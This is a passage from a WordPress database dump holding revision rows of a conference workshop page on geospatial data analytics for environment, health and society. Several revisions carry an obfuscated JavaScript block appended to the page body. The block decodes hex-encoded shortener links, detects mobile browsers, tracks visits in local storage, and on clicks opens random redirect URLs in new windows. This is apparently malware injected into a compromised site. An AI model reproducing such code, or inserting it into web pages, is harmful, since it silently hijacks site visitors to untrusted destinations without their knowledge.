Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:46:57','2023-01-14 01:46:57','',3427,'https://gsw2023.com/?p=3547',0,'revision','',0),
(3548,1,'2023-01-14 01:49:43','2023-01-14 01:49:43','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.</p>\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\n<p>&nbsp;</p>\n<p>I.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</p>\n<p>&nbsp;</p>\n<p>II.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</p>\n<p>&nbsp;</p>\n<p>III.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</p>\n<p>&nbsp;</p>\n<p>IV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</p>\n<p>&nbsp;</p>\n<p>V.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</p>\n<p>&nbsp;</p>\n<p>VI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:49:43','2023-01-14 01:49:43','',3427,'https://gsw2023.com/?p=3548',0,'revision','',0),
(3549,1,'2023-01-14 01:53:53','2023-01-14 01:53:53','','Untitled','','inherit','open','closed','','untitled','','','2023-01-14 01:53:53','2023-01-14 01:53:53','',3433,'https://gsw2023.com/wp-content/uploads/2022/12/Untitled.jpg',0,'attachment','image/jpeg',0),
(3551,1,'2023-01-14 01:56:19','2023-01-14 01:56:19','','Untitled','','inherit','open','closed','','untitled-2','','','2023-01-14 01:56:19','2023-01-14 01:56:19','',3433,'https://gsw2023.com/wp-content/uploads/2022/12/Untitled-1.jpg',0,'attachment','image/jpeg',0),
(3552,1,'2023-01-14 01:57:17','2023-01-14 01:57:17','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.</p>\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\n<p>&nbsp;</p>\n<p>I.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</p>\n<p>&nbsp;</p>\n<p>II.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</p>\n<p>&nbsp;</p>\n<p>III.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</p>\n<p>&nbsp;</p>\n<p>IV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</p>\n<p>&nbsp;</p>\n<p>V.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</p>\n<p>&nbsp;</p>\n<p>VI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of 